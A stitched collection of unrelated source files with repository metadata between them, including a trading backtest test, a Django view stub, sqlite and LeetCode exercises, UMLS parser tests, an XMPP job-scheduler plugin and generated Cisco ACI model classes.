'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.5,
-0.5,
-0.5,
0.5],
23456: [0.5,
-0.5,
0.5,
-0.5]}
)
net_exposures = results.loc["NetExposure"].reset_index()
net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
net_exposures.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-0.5,
-0.5],
23456: ["nan",
0.5,
-0.5,
0.5]}
)
trades = results.loc["Trade"].reset_index()
trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
trades.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: ["nan",
0.5,
-1.0,
0.0],
23456: ["nan",
0.5,
-1.0,
1.0]}
)
slippage = results.loc["Slippage"].reset_index()
slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
slippage.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
0.005,
0.01,
0.0],
23456: [0.0,
0.005,
0.01,
0.01]}
)
returns = results.loc["Return"]
returns = returns.reset_index()
returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
self.assertDictEqual(
returns.to_dict(orient="list"),
{'Date': [
'2018-05-01T00:00:00',
'2018-05-02T00:00:00',
'2018-05-03T00:00:00',
'2018-05-04T00:00:00'],
12345: [0.0,
-0.005,
-0.0327273, # (10.50 - 11)/11 * 0.5 - 0.01
0.0242857], # (9.99 - 10.50)/10.50 * -0.5
23456: [0.0,
-0.005,
-0.1236364, # (8.50 - 11)/11 * 0.5 - 0.001
-0.1276471] # (10.50 - 8.50)/8.50 * -0.5 - 0.01
}
)
| [
"brian@quantrocket.com"
] | brian@quantrocket.com |
0ec0747aea6f065bfb873f5d9291c4687494bf7b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/views_20211114183757.py | 5bdf30cc1996d4f9f8116bb63430e3540af0ba18 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 212 | py | from django.shortcuts import render, get_object_or_404
from .models import Blog
from django.views import generic
# Create your views here.
class BlogList(generic.ListView):
queryset = Blog.objects.filter(st) | [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
2a75f41f27e37ffea0a9f08cd9194e665ffb1f11 | fcbedcc2f7483a4b3ce9111c9c889bd4a5079496 | /sql/sqlg.py | 899817382ff5aeea50f67d3d8c32f2d871fad008 | [] | no_license | kevlab/RealPython2 | aab94de91d0824290bfce4a318f57f4fe5282f19 | a85f92563b414830431a79d2448682da0c12d645 | refs/heads/master | 2021-01-10T19:10:46.035344 | 2015-05-27T02:24:48 | 2015-05-27T02:24:48 | 31,555,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | # UPDATE and DELETE statements
import sqlite3
with sqlite3.connect('new.db') as connection:
c = connection.cursor()
# update
c.execute("""UPDATE population SET population = 9000000 WHERE
city ='New York City'""")
# delete
c.execute("DELETE FROM population WHERE city='Boston'")
print "\nNEW DATA:\n"
c.execute("SELECT * FROM population")
rows = c.fetchall()
for r in rows:
print r[0], r[1], r[2]
| [
"greenleaf1348@gmail.com"
] | greenleaf1348@gmail.com |
84e69319d015573313a7536fe6d36c82f50e5297 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetcodePythonProject/leetcode_0001_0050/LeetCode003_LongestSubstingWithoutRepeatingCharacters.py | 7161fed14178c544c2c29ac5762c77a963af8832 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 828 | py | '''
Created on May 5, 2017
@author: MT
'''
class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
left = 0
hashset = set()
maxLen = 0
for i, c in enumerate(s):
while left < i and c in hashset:
hashset.discard(s[left])
left += 1
hashset.add(c)
maxLen = max(maxLen, i-left+1)
return maxLen
def test(self):
testCases = [
'abc',
'bbbb',
'abcdba',
]
for s in testCases:
print('s: %s' % s)
result = self.lengthOfLongestSubstring(s)
print('result: %s' % result)
print('-='*30+'-')
if __name__ == '__main__':
Solution().test()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
b55e6344c718b94dc01be9ce249c8634c25f9516 | 7fbb4f70493a27d2b0fe2c107a1055e493bf7188 | /taobao-tianmao/top/api/rest/TmallExchangeMessagesGetRequest.py | 67817273e9db4bf66611b203f8cb229606beb032 | [
"Apache-2.0"
] | permissive | ScottLeeF/python-example | da9d78a85cce914153f1c5ad662d28cddde0fc0f | 0b230ba80fe5020d70329a9d73e058013f0ca111 | refs/heads/master | 2022-12-03T00:24:47.035304 | 2020-04-21T09:51:12 | 2020-04-21T09:51:12 | 242,459,649 | 0 | 0 | Apache-2.0 | 2022-11-22T05:29:21 | 2020-02-23T05:03:19 | Python | UTF-8 | Python | false | false | 471 | py | '''
Created by auto_sdk on 2018.08.09
'''
from top.api.base import RestApi
class TmallExchangeMessagesGetRequest(RestApi):
def __init__(self, domain='gw.api.taobao.com', port=80):
RestApi.__init__(self, domain, port)
self.dispute_id = None
self.fields = None
self.operator_roles = None
self.page_no = None
self.page_size = None
def getapiname(self):
return 'tmall.exchange.messages.get'
| [
"fei.li@tuanche.com"
] | fei.li@tuanche.com |
46e5affa680c2833075c70e0956b9914e2f798ce | 8c4cd2a8725f8f04e5b2fee3bc8f67fb7b4af446 | /benchmarks/benchmark_dual_dmp.py | 9369f7b297cea7f2ea2c075f8b349b3127e99a0d | [
"BSD-3-Clause"
] | permissive | dfki-ric/movement_primitives | 37c08aade84f5abc4248b7281e6a1c441cf642a9 | 327b192608747e20e555f59671903854045c4713 | refs/heads/main | 2023-07-20T07:57:52.938054 | 2023-05-22T13:10:47 | 2023-05-22T13:10:47 | 429,049,411 | 97 | 29 | NOASSERTION | 2023-07-18T08:58:30 | 2021-11-17T13:06:49 | Python | UTF-8 | Python | false | false | 881 | py | from functools import partial
import numpy as np
from movement_primitives.dmp import DualCartesianDMP
import timeit
start_y = np.array([0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0])
goal_y = np.array([1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0])
dt = 0.01
int_dt = 0.001
dmp = DualCartesianDMP(execution_time=1.0, dt=dt, n_weights_per_dim=6, int_dt=int_dt)
dmp.configure(start_y=start_y, goal_y=goal_y)
dmp.set_weights(1000 * np.random.randn(*dmp.get_weights().shape))
times = timeit.repeat(partial(dmp.open_loop, step_function="cython"), repeat=10, number=1)
print("Cython")
print("Mean: %.5f; Std. dev.: %.5f" % (np.mean(times), np.std(times)))
times = timeit.repeat(partial(dmp.open_loop, step_function="python"), repeat=10, number=1)
print("Python")
print("Mean: %.5f; Std. dev.: %.5f" % (np.mean(times), np.std(times)))
| [
"afabisch@googlemail.com"
] | afabisch@googlemail.com |
69dcf77fe8c8f4bf7999ba12fd6efc072ff19e6a | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /servicecatalog_read/provisioned-product-output_get.py | 01fe1a4ce4eb011dd07c8fc189e38f995cc52cf0 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import read_no_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/servicecatalog/get-provisioned-product-outputs.html
if __name__ == '__main__':
"""
"""
add_option_dict = {}
#######################################################################
# setting option use
# ex: add_option_dict["setting_matching_parameter"] = "--owners"
# ex: add_option_dict["setting_key"] = "owner_id"
#######################################################################
# single parameter
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
read_no_parameter("servicecatalog", "get-provisioned-product-outputs", add_option_dict) | [
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
c934f71b537bf189c6aefbe18b994545c9942e1c | 04401ec5768d909ef95b3021dd39d280cdac7356 | /flags/flags2_common.py | 5a073a5e08ad15b91c298578cf78dbcec4edf52c | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | pythonfluente/concorrencia2020 | 82f826fbcfc36c41cda251cbeaf370a6822b3cdf | 62b1f506fd69b77b67a20aedf6b204f543912c82 | refs/heads/master | 2021-04-03T12:32:48.565498 | 2020-12-20T01:03:20 | 2020-12-20T01:03:20 | 248,353,395 | 7 | 7 | BSD-3-Clause | 2020-04-21T14:28:29 | 2020-03-18T22:06:21 | Python | UTF-8 | Python | false | false | 5,097 | py | """Utilities for second set of flag examples.
"""
import os
import time
import sys
import string
import argparse
from collections import namedtuple
from enum import Enum
Result = namedtuple('Result', 'status data')
HTTPStatus = Enum('Status', 'ok not_found error')
POP20_CC = ('CN IN US ID BR PK NG BD RU JP '
'MX PH VN ET EG DE IR TR CD FR').split()
DEFAULT_CONCUR_REQ = 1
MAX_CONCUR_REQ = 1
SERVERS = {
'REMOTE': 'http://flupy.org/data/flags',
'LOCAL': 'http://localhost:8001/flags',
'DELAY': 'http://localhost:8002/flags',
'ERROR': 'http://localhost:8003/flags',
}
DEFAULT_SERVER = 'LOCAL'
DEST_DIR = 'downloaded/'
COUNTRY_CODES_FILE = 'country_codes.txt'
def save_flag(img, filename):
path = os.path.join(DEST_DIR, filename)
with open(path, 'wb') as fp:
fp.write(img)
def initial_report(cc_list, actual_req, server_label):
if len(cc_list) <= 10:
msg = ', '.join(cc_list)
else:
msg = f'from {cc_list[0]} to {cc_list[-1]}'
print(f'{server_label} site: {SERVERS[server_label]}')
plural = 's' if len(cc_list) != 1 else ''
print(f'Searching for {len(cc_list)} flag{plural}: {msg}')
plural = 's' if actual_req != 1 else ''
print(f'{actual_req} concurrent connection{plural} will be used.')
def final_report(cc_list, counter, start_time):
elapsed = time.time() - start_time
print('-' * 20)
plural = 's' if counter[HTTPStatus.ok] != 1 else ''
print(f'{counter[HTTPStatus.ok]} flag{plural} downloaded.')
if counter[HTTPStatus.not_found]:
print(counter[HTTPStatus.not_found], 'not found.')
if counter[HTTPStatus.error]:
plural = 's' if counter[HTTPStatus.error] != 1 else ''
print(f'{counter[HTTPStatus.error]} error{plural}.')
print(f'Elapsed time: {elapsed:.2f}s')
def expand_cc_args(every_cc, all_cc, cc_args, limit):
codes = set()
A_Z = string.ascii_uppercase
if every_cc:
codes.update(a+b for a in A_Z for b in A_Z)
elif all_cc:
with open(COUNTRY_CODES_FILE) as fp:
text = fp.read()
codes.update(text.split())
else:
for cc in (c.upper() for c in cc_args):
if len(cc) == 1 and cc in A_Z:
codes.update(cc+c for c in A_Z)
elif len(cc) == 2 and all(c in A_Z for c in cc):
codes.add(cc)
else:
msg = 'each CC argument must be A to Z or AA to ZZ.'
raise ValueError('*** Usage error: '+msg)
return sorted(codes)[:limit]
def process_args(default_concur_req):
server_options = ', '.join(sorted(SERVERS))
parser = argparse.ArgumentParser(
description='Download flags for country codes. '
'Default: top 20 countries by population.')
parser.add_argument('cc', metavar='CC', nargs='*',
help='country code or 1st letter (eg. B for BA...BZ)')
parser.add_argument('-a', '--all', action='store_true',
help='get all available flags (AD to ZW)')
parser.add_argument('-e', '--every', action='store_true',
help='get flags for every possible code (AA...ZZ)')
parser.add_argument('-l', '--limit', metavar='N', type=int,
help='limit to N first codes', default=sys.maxsize)
parser.add_argument('-m', '--max_req', metavar='CONCURRENT', type=int,
default=default_concur_req,
help=f'maximum concurrent requests (default={default_concur_req})')
parser.add_argument('-s', '--server', metavar='LABEL',
default=DEFAULT_SERVER,
help=f'server to hit: one of {server_options} (default={DEFAULT_SERVER})')
parser.add_argument('-v', '--verbose', action='store_true',
help='output detailed progress info')
args = parser.parse_args()
if args.max_req < 1:
print('*** Usage error: --max_req CONCURRENT must be >= 1')
parser.print_usage()
sys.exit(1)
if args.limit < 1:
print('*** Usage error: --limit N must be >= 1')
parser.print_usage()
sys.exit(1)
args.server = args.server.upper()
if args.server not in SERVERS:
print('*** Usage error: --server LABEL must be one of',
server_options)
parser.print_usage()
sys.exit(1)
try:
cc_list = expand_cc_args(args.every, args.all, args.cc, args.limit)
except ValueError as exc:
print(exc.args[0])
parser.print_usage()
sys.exit(1)
if not cc_list:
cc_list = sorted(POP20_CC)
return args, cc_list
def main(download_many, default_concur_req, max_concur_req):
args, cc_list = process_args(default_concur_req)
actual_req = min(args.max_req, max_concur_req, len(cc_list))
initial_report(cc_list, actual_req, args.server)
base_url = SERVERS[args.server]
t0 = time.time()
counter = download_many(cc_list, base_url, args.verbose, actual_req)
assert sum(counter.values()) == len(cc_list), \
'some downloads are unaccounted for'
final_report(cc_list, counter, t0)
| [
"luciano@ramalho.org"
] | luciano@ramalho.org |
1dc8801b64037a4f969242a0a4870dc67f6ad153 | e43f0e33bc07f9c8866dd7db88c80576e5d3d9c3 | /tests/parsers_umls_test.py | d55f67cd98b4b5d8af0fb0904f95307780051333 | [] | no_license | bearnd/mt-ingester | ef5fc47d57d4bade7ce76f303425f861f74c00d8 | cc4503b715d862af0ec82fdea666386e9265e56e | refs/heads/master | 2023-03-08T10:54:22.682969 | 2019-09-14T13:45:26 | 2019-09-14T13:45:26 | 338,612,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,301 | py | # coding=utf-8
import os
import unittest
from mt_ingester.parsers import ParserUmlsSat
from mt_ingester.parsers import ParserUmlsConso
from mt_ingester.parsers import ParserUmlsDef
from tests.assets.samples_umls import get_sample_file
from tests.assets.samples_umls import EnumUmlsFileSample
class ParserUmlsSatTest(unittest.TestCase):
""" Tests the `ParserUmlsSat` class."""
def setUp(self):
""" Retrieves a sample MRSAT.RRF file and instantiates the parser."""
self.file = get_sample_file(umls_file_type=EnumUmlsFileSample.MRSAT)
self.parser = ParserUmlsSat()
def tearDown(self):
""" Deletes the temporary MRSAT.RRF file."""
os.remove(self.file.name)
def test_parse(self):
""" Tests the `parse` method of the parser class."""
map_cui_dui = self.parser.parse(filename_mrsat_rrf=self.file.name)
self.assertDictEqual(
map_cui_dui,
{
'C0001175': 'D000163',
'C0006118': 'D001932',
'C0024537': 'D016780',
'C0153633': 'D001932',
'C0750974': 'D001932',
'C0750979': 'D001932',
'C1527390': 'D001932',
}
)
class ParserUmlsConsoTest(unittest.TestCase):
""" Tests the `ParserUmlsConso` class."""
def setUp(self):
""" Retrieves sample MRSAT.RRF and MRCONSO.RRF files and instantiates
the parser.
"""
self.file_mrsat = get_sample_file(
umls_file_type=EnumUmlsFileSample.MRSAT,
)
self.file_mrconso = get_sample_file(
umls_file_type=EnumUmlsFileSample.MRCONSO,
)
self.parser = ParserUmlsConso()
def tearDown(self):
""" Deletes the temporary MRSAT.RRF and MRCONSO.RRF files."""
os.remove(self.file_mrsat.name)
os.remove(self.file_mrconso.name)
def test_parse(self):
""" Tests the `parse` method of the parser class."""
dui_synonyms = self.parser.parse(
filename_mrsat_rrf=self.file_mrsat.name,
filename_mrconso_rrf=self.file_mrconso.name,
)
dui_synonyms_refr = {
'D000163': [
'acquired immunodeficiency syndrome',
'acquired immunodeficiency syndromes',
'syndromes, acquired immunodeficiency',
],
'D001932': [
'neoplasm, brain',
'brain tumors',
'brain tumors, primary',
'neoplasms, intracranial',
],
'D016780': [
'plasmodium vivax malaria',
'vivax malaria',
]
}
self.assertListEqual(
sorted(list(dui_synonyms.keys())),
sorted(list(dui_synonyms_refr.keys())),
)
for k, v in dui_synonyms_refr.items():
self.assertListEqual(
sorted(list(dui_synonyms[k])),
sorted(list(dui_synonyms_refr[k])),
)
class ParserUmlsDefTest(unittest.TestCase):
""" Tests the `ParserUmlsDef` class."""
def setUp(self):
""" Retrieves sample MRSAT.RRF and MRDEF.RRF files and instantiates
the parser.
"""
self.file_mrsat = get_sample_file(
umls_file_type=EnumUmlsFileSample.MRSAT,
)
self.file_mrdef = get_sample_file(
umls_file_type=EnumUmlsFileSample.MRDEF,
)
self.parser = ParserUmlsDef()
def tearDown(self):
""" Deletes the temporary MRSAT.RRF and MRDEF.RRF files."""
os.remove(self.file_mrsat.name)
os.remove(self.file_mrdef.name)
def test_parse(self):
""" Tests the `parse` method of the parser class."""
dui_definitions = self.parser.parse(
filename_mrsat_rrf=self.file_mrsat.name,
filename_mrdef_rrf=self.file_mrdef.name,
)
dui_definitions_refr = {
'D000163': {
'CSP': [
('one or more indicator diseases, depending on '
'laboratory evidence of HIV infection (CDC); late '
'phase of HIV infection characterized by marked '
'suppression of immune function resulting in '
'opportunistic infections, neoplasms, and other systemic '
'symptoms (NIAID).')
],
'NCI_NICHD': [
('A chronic, potentially life threatening condition that '
'is caused by human immunodeficiency virus (HIV) '
'infection, and is characterized by increased '
'susceptibility to opportunistic infections, certain '
'cancers and neurologic disorders.')
]
},
'D001932': {
'NCI': [
('A benign or malignant neoplasm that arises from or '
'metastasizes to the brain.')
],
'NCI_NICHD': [
'An abnormal intracranial solid mass or growth.'
]
},
'D016780': {
'MSH': [
('Malaria caused by PLASMODIUM VIVAX. This form of '
'malaria is less severe than MALARIA, FALCIPARUM, but '
'there is a higher probability for relapses to occur. '
'Febrile paroxysms often occur every other day.')
],
'NCI': [
'Malaria resulting from infection by Plasmodium vivax.'
]
}
}
self.assertListEqual(
sorted(list(dui_definitions.keys())),
sorted(list(dui_definitions_refr.keys())),
)
for k, v in dui_definitions.items():
self.assertListEqual(
sorted(list(dui_definitions[k].keys())),
sorted(list(dui_definitions_refr[k].keys())),
)
for kk, vv in dui_definitions[k].items():
self.assertListEqual(
sorted(list(dui_definitions[k][kk])),
sorted(list(dui_definitions_refr[k][kk])),
)
| [
"somada141@gmail.com"
] | somada141@gmail.com |
2ae2bdf8815a466c8b0684f4c105ab6bdd9fe01d | 190d03cf370844548b9e8c89952dfbaec4d0c5c8 | /p622.py | ca9b0956d3c39375b432f18dfc33e341c309628f | [] | no_license | alainlou/leetcode | 446d101a9fd2f9eaa2229252e5909e7df36b4a74 | fe500bcb067be59aa048259e3860e9da6f98344d | refs/heads/master | 2022-10-16T12:20:44.726963 | 2022-09-18T15:29:05 | 2022-09-18T15:29:05 | 178,775,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | class MyCircularQueue:
def __init__(self, k: int):
self.k = k
self.arr = [None]*k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.isFull():
return False
else:
if self.isEmpty():
self.arr[self.rear] = value
else:
self.arr[(self.rear + 1)%self.k] = value
self.rear = (self.rear + 1)%self.k
return True
def deQueue(self) -> bool:
if self.isEmpty():
return False
else:
if self.front == self.rear:
self.arr[self.front] = None
else:
self.arr[self.front] = None
self.front = (self.front + 1)%self.k
return True
def Front(self) -> int:
return self.arr[self.front] if not self.isEmpty() else -1
def Rear(self) -> int:
return self.arr[self.rear] if not self.isEmpty() else -1
def isEmpty(self) -> bool:
return self.arr[self.front] is None
def isFull(self) -> bool:
return (self.rear + 1)%self.k == self.front if self.k > 1 else self.arr[self.front] != None
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
| [
"az2lou@uwaterloo.ca"
] | az2lou@uwaterloo.ca |
a3157751b8c0617b6c1de79a6d8a459cd0630e40 | 241b3cef3f7146ca332b45a8e3d4005a9e93d024 | /kestrel/plugins/kestrel_tasks.py | 0f84c537dcba24810ff5e77e0a22b82406883da7 | [
"Apache-2.0"
] | permissive | joelimome/Kestrel | c5ec380ec0395df3213e63cd7389f68551350b62 | 199075569e57d72676512a4eaf64e82c21248460 | refs/heads/master | 2021-01-18T06:44:00.105322 | 2010-10-11T14:35:11 | 2010-10-11T14:35:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Kestrel: An XMPP-based Job Scheduler
# Author: Lance Stout <lancestout@gmail.com>
#
# Credits: Nathan Fritz <fritzy@netflint.net>
#
# Copyright 2010 Lance Stout
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import threading
import signal
import subprocess
import sleekxmpp
from sleekxmpp.plugins import base
from sleekxmpp.xmlstream import JID
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import MatchXPath
from sleekxmpp.xmlstream.stanzabase import ElementBase, ET
from sleekxmpp.xmlstream.stanzabase import registerStanzaPlugin
from sleekxmpp.stanza.iq import Iq
from kestrel.stanza.task import Task
class kestrel_tasks(base.base_plugin):
def plugin_init(self):
self.description = "Kestrel Worker"
self.capabilities = self.config.get('capabilities', [])
self.xmpp.registerHandler(
Callback('Kestrel Task',
MatchXPath('{%s}iq/{%s}task' % (self.xmpp.default_ns,
Task.namespace)),
self.handle_task))
registerStanzaPlugin(Iq, Task)
self.xmpp.add_event_handler('kestrel_task', self.start_task, threaded=True)
self.xmpp.add_event_handler('kestrel_task_cancel', self.cancel_task, threaded=True)
self.tasks = {}
self.max_tasks = 1
self.lock = threading.Lock()
def post_init(self):
base.base_plugin.post_init(self)
self.xmpp['xep_0030'].add_feature('kestrel:tasks')
self.xmpp['xep_0030'].add_node('kestrel:tasks:capabilities')
caps = self.xmpp['xep_0030'].nodes['kestrel:tasks:capabilities']
for cap in self.capabilities:
caps.addFeature(cap)
def setMaxTasks(self, num):
self.max_tasks = num
def setCapabilities(self, caps):
node = self.xmpp['xep_0030'].nodes['kestrel:tasks:capabilities']
node.setFeatures(caps)
def handle_task(self, iq):
task = iq['kestrel_task']
logging.info("TASK: Received task: %s" % str(iq))
if task['action'] == 'execute' and task['command'] == '':
self._sendError(iq, '406', 'modify', 'not-acceptable')
return
# Todo: Check sender for authorization
events = {'execute': 'kestrel_task',
'cancel': 'kestrel_task_cancel'}
self.xmpp.event(events[task['action']], iq)
def start_task(self, iq):
from_jid = iq['from'].jid
task = iq['kestrel_task']
process_id = (iq['from'].user, iq['from'].resource)
if len(self.tasks) >= self.max_tasks:
self._sendError(iq, '500', 'cancel', 'resource-constraint')
return
if len(self.tasks) == self.max_tasks - 1:
# Send busy status if we will reach the max number of
# tasks when we start this one.
self.xmpp.sendPresence(pshow='dnd', pstatus='Executing Task')
iq.reply()
iq['kestrel_task']['status'] = 'executing'
iq.send()
self.xmpp.event('kestrel_task_started', iq)
command = "%s %s" % (task['command'], process_id[1])
if self._execute(process_id, command):
iq = self.xmpp.Iq()
iq['to'] = from_jid
iq['kestrel_task']['status'] = 'complete'
iq.send()
else:
iq = self.xmpp.Iq()
iq['from'] = from_jid
self._sendError(iq, '500', 'cancel', 'internal-server-error')
with self.lock:
if process_id in self.tasks:
del self.tasks[process_id]
self.xmpp.event('kestrel_task_finished', iq)
if task['cleanup']:
command = "%s %s" % (task['cleanup'], process_id[1])
self._execute(process_id, command, cleanup=True)
self.xmpp.sendPresence(pstatus='Ready for Task')
def cancel_task(self, iq):
process_id = (iq['from'].user, iq['from'].resource)
if self._cancel(process_id):
iq.reply().send()
self.xmpp.event('kestrel_task_cancelled', iq)
else:
self._sendError(iq, '404', 'cancel', 'item-not-found')
def _execute(self, name, command, cleanup=False):
"""Wrapper function to open a subprocess."""
try:
task_process = subprocess.Popen(['sh', '-c', "%s" % command],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid)
if not cleanup:
with self.lock:
self.tasks[name] = task_process
logging.info("TASK: Task started: %s (%s)" % (name, command))
task_process.wait()
logging.info("TASK: Task finished: %s (%s)" % (name, command))
else:
logging.info("TASK: Cleanup started: %s (%s)" % (name, command))
task_process.wait()
logging.info("TASK: Cleanup finished: %s (%s)" % (name, command))
return True
except:
error_type = "cleanup" if cleanup else "task"
logging.info("TASK: Error starting %s: (%s)" % (error_type, command))
return False
def _cancel(self, name):
"""Wrapper function to kill a subprocess."""
if name not in self.tasks:
logging.info("TASK: Tried cancelling task %s, but task not found." % str(name))
return False
task_process = self.tasks[name]
logging.info("TASK: Cancelling task %s" % str(name))
try:
os.killpg(task_process.pid, signal.SIGKILL)
except:
pass
with self.lock:
if name in self.tasks:
del self.tasks[name]
return True
def _sendError(self, iq, code, etype, condition, text=''):
iq.reply().error()
iq['error']['code'] = code
iq['error']['type'] = etype
iq['error']['condition'] = condition
iq['error']['text'] = text
iq.send()
| [
"lancestout@gmail.com"
] | lancestout@gmail.com |
09c98f2636180514e61419c174e02ce50a07fb96 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /oxf7b7vroXvWBJ9Nq_18.py | c91857e0445c9860163566659cc778edc4feb4b3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py |
import re
def discount(n, txt):
if not len(txt): return n
discounts = sorted(txt.split(", "), key=lambda x: x[-1])
for d in discounts:
if d[-1] == "%":
n -= float(d[:-1])/100*n
else:
n -= float(d)
sol = "{:.2f}".format(n)
return int(sol[:-3]) if sol[-3:] == ".00" else float(re.sub(r"0+$", "", sol))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7432e39a052baa01c42ba905cda58827685faba5 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqptdiagp/porttestsetbt.py | 3ad8df35a3b2c025a8b87153e3ac3134883bd056 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 6,214 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class PortTestSetBt(Mo):
meta = ClassMeta("cobra.model.eqptdiagp.PortTestSetBt")
meta.isAbstract = True
meta.moClassName = "eqptdiagpPortTestSetBt"
meta.moClassName = "eqptdiagpPortTestSetBt"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "On-Demand Diag Policy Set for the Specified Card Type"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.eqptdiagp.TestSet")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.eqptdiagp.TestSetBoot")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtLeafP")
meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtFabP")
meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtExtChHP")
meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtExtChFP")
